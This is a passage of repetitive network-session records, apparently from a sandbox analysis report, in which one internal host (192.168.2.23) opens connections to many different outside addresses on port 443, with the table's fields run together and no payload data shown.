                                          16420192.168.2.2356008192.79.240.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16421192.168.2.2353496145.198.217.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16422192.168.2.2333764155.42.126.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16423192.168.2.2340656192.104.167.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16424192.168.2.235646676.181.212.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16425192.168.2.234228842.170.101.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16426192.168.2.2342818126.243.23.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16427192.168.2.2341162118.122.90.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16428192.168.2.2347750143.17.125.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16429192.168.2.2340084174.151.142.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16430192.168.2.2343042152.95.68.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16431192.168.2.2348084174.138.143.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16432192.168.2.2336126158.116.80.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16433192.168.2.2349012200.37.23.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16434192.168.2.2337774136.13.9.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16435192.168.2.234340878.108.123.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16436192.168.2.2348012140.208.27.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16437192.168.2.2353740147.186.177.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16438192.168.2.2347362156.205.94.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16439192.168.2.235074089.33.28.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16440192.168.2.2355194119.213.100.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16441192.168.2.235559037.81.7.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16442192.168.2.2337506106.179.84.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16443192.168.2.234175670.39.218.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16444192.168.2.2343864178.51.89.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16445192.168.2.234368840.197.178.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16446192.168.2.235013260.134.157.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16447192.168.2.2333806191.166.118.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16448192.168.2.234407287.65.41.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16449192.168.2.2357166221.37.108.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16450192.168.2.235329096.7.34.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16451192.168.2.235890641.181.99.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16452192.168.2.235511445.38.140.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16453192.168.2.2343510218.251.18.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16454192.168.2.2356284128.163.44.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16455192.168.2.2345506111.148.16.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16456192.168.2.2359866204.186.19.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16457192.168.2.234106488.193.175.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16458192.168.2.234051694.216.52.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16459192.168.2.2337858140.91.9.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16460192.168.2.235274460.8.31.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16461192.168.2.23463748.106.109.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16462192.168.2.234397435.158.19.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16463192.168.2.235309834.241.47.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16464192.168.2.233317071.11.229.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16465192.168.2.2349390117.16.56.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16466192.168.2.2344238114.26.22.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16467192.168.2.2342584107.254.154.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16468192.168.2.2349334198.214.31.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16469192.168.2.235908679.135.196.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16470192.168.2.233899454.92.20.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16471192.168.2.2334582213.3.29.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16472192.168.2.2345918185.54.106.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16473192.168.2.2348572182.20.156.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16474192.168.2.233510858.74.225.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16475192.168.2.2359028218.208.64.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16476192.168.2.233972249.84.219.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16477192.168.2.2334480167.135.200.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16478192.168.2.2348380147.18.181.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16479192.168.2.235205231.217.72.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16480192.168.2.2357376200.17.129.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16481192.168.2.23357065.246.131.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16482192.168.2.2333222205.143.243.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16483192.168.2.235033493.29.76.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16484192.168.2.2334330183.180.127.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16485192.168.2.2332876174.0.76.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16486192.168.2.2340352175.113.86.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16487192.168.2.235413493.94.90.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16488192.168.2.2349288108.138.154.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16489192.168.2.234959813.84.186.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16490192.168.2.2349182101.1.130.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16491192.168.2.235580298.36.168.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16492192.168.2.2343612198.67.66.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16493192.168.2.233805484.253.56.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16494192.168.2.2335024161.141.255.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16495192.168.2.234436457.245.88.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16496192.168.2.2354876178.47.230.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16497192.168.2.2347912172.126.153.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16498192.168.2.2347248137.250.8.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16499192.168.2.234235463.6.75.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16500192.168.2.234985079.24.176.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16501192.168.2.235305465.209.138.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16502192.168.2.2336440134.176.118.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16503192.168.2.2353656195.74.96.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16504192.168.2.235055886.96.42.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16505192.168.2.236013427.13.8.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16506192.168.2.2354576150.219.20.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16507192.168.2.2348676138.102.101.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16508192.168.2.235781464.150.126.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16509192.168.2.2342790168.149.243.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16510192.168.2.233571896.164.118.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16511192.168.2.2335298208.60.90.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16512192.168.2.235702459.110.243.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16513192.168.2.2352834192.112.43.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16514192.168.2.2353626126.175.185.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16515192.168.2.235893890.94.218.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16516192.168.2.2337198139.76.94.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16517192.168.2.2349450197.82.222.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16518192.168.2.2360298126.8.6.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16519192.168.2.2337902155.68.192.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16520192.168.2.234865618.4.254.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16521192.168.2.2337362122.62.43.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16522192.168.2.2348804130.212.2.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16523192.168.2.2336590198.167.206.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16524192.168.2.234184078.136.42.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16525192.168.2.2345872217.216.172.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16526192.168.2.2360150130.10.95.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16527192.168.2.2343736116.221.136.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16528192.168.2.2348372201.235.190.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16529192.168.2.234371638.146.213.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16530192.168.2.233303081.7.158.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16531192.168.2.2349434101.32.77.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16532192.168.2.2343752137.29.203.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16533192.168.2.2338120147.129.196.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16534192.168.2.2334290160.149.125.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16535192.168.2.2340550142.58.183.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16536192.168.2.236093642.32.7.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16537192.168.2.234599699.195.117.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16538192.168.2.2344638206.157.51.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16539192.168.2.2353786205.148.212.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16540192.168.2.2343504142.58.90.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16541192.168.2.2360654130.218.126.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16542192.168.2.2356662114.179.121.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16543192.168.2.234554639.237.12.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16544192.168.2.2342404210.90.21.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16545192.168.2.235672650.11.238.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16546192.168.2.2342626179.127.93.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16547192.168.2.2353222112.224.144.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16548192.168.2.2354468113.131.64.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16549192.168.2.233931895.177.33.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16550192.168.2.2342192113.38.142.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16551192.168.2.2359968112.207.137.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16552192.168.2.234775699.141.28.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16553192.168.2.2352222155.192.166.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16554192.168.2.2356452117.187.7.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16555192.168.2.234692665.18.114.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16556192.168.2.2356830202.229.152.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16557192.168.2.2348800222.30.18.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16558192.168.2.234075427.167.0.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16559192.168.2.2332776172.95.46.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16560192.168.2.2346396121.12.46.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16561192.168.2.235873639.96.187.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16562192.168.2.2340866216.180.105.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16563192.168.2.235701297.40.98.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16564192.168.2.2336562208.40.189.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16565192.168.2.233938223.218.1.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16566192.168.2.2342652123.70.194.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16567192.168.2.235273017.179.143.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16568192.168.2.2359450107.206.95.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16569192.168.2.2348412134.174.77.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16570192.168.2.2348308185.113.246.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16571192.168.2.234821081.172.108.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16572192.168.2.234541425.192.88.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16573192.168.2.234071878.135.227.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16574192.168.2.2351522185.0.187.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16575192.168.2.2358558119.71.4.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16576192.168.2.2337070114.222.71.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16577192.168.2.2343382164.118.168.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16578192.168.2.23563464.150.112.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16579192.168.2.233783425.182.17.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16580192.168.2.234568646.255.25.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16581192.168.2.2345004149.54.45.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16582192.168.2.234034483.171.12.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16583192.168.2.235300262.180.54.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16584192.168.2.2354986218.240.57.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16585192.168.2.233453023.90.189.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16586192.168.2.2353448211.76.42.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16587192.168.2.23582902.73.128.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16588192.168.2.233776487.99.204.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16589192.168.2.2355528107.252.221.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16590192.168.2.234249239.150.126.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16591192.168.2.233452653.49.199.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16592192.168.2.235627253.161.184.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16593192.168.2.235925472.242.171.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16594192.168.2.2340676202.71.124.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16595192.168.2.2347754136.38.175.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16596192.168.2.235086848.248.204.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16597192.168.2.23441482.134.173.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16598192.168.2.2345438195.42.128.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16599192.168.2.2352996201.91.126.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16600192.168.2.2356328145.167.238.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16601192.168.2.2334294147.131.233.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16602192.168.2.2350498190.146.65.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16603192.168.2.235104080.216.29.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16604192.168.2.235232224.251.79.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16605192.168.2.2347990156.167.25.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16606192.168.2.2332776104.131.219.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16607192.168.2.2356300204.101.49.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16608192.168.2.2354518122.236.126.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16609192.168.2.234636246.54.225.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16610192.168.2.2357126108.252.230.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16611192.168.2.235869036.115.221.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16612192.168.2.2339188181.85.32.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16613192.168.2.2348744151.166.96.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16614192.168.2.2344970143.185.199.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16615192.168.2.234427417.99.198.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16616192.168.2.233308064.137.23.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16617192.168.2.2360098103.240.229.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16618192.168.2.233282276.215.111.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16619192.168.2.2348902190.224.70.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16620192.168.2.235853266.239.81.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16621192.168.2.236076898.171.142.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16622192.168.2.2352778140.86.86.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16623192.168.2.2338860147.32.108.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16624192.168.2.2358300216.128.147.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16625192.168.2.234273620.132.32.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16626192.168.2.23482349.95.77.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16627192.168.2.234981051.75.61.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16628192.168.2.2343926150.177.51.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16629192.168.2.235114463.157.183.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16630192.168.2.2342736164.221.204.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16631192.168.2.234153497.71.160.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16632192.168.2.2335152175.132.60.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16633192.168.2.2349490206.83.95.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16634192.168.2.235840865.108.175.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16635192.168.2.2341662162.53.250.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16636192.168.2.23475521.127.197.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16637192.168.2.2333440118.216.69.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16638192.168.2.2344992157.167.34.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16639192.168.2.235014020.5.220.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16640192.168.2.2347024131.240.140.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16641192.168.2.2349778110.170.217.216443
                                          TimestampBytes transferredDirectionData


